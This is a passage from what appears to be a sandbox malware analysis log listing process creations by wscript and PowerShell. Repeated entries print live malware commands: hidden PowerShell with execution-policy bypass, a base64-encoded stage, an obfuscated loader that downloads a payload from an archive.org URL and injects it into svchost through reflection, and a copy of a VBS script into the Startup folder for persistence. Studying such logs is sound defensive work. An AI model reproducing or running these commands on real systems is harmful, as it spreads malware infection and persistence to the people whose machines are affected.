'+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\public\documents\pow\wm.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\public\documents\pow\wm.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\public\documents\pow\wm.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd |
|
Source: C:\Windows\System32\conhost.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression" |
|
Source: C:\Windows\System32\wscript.exe |
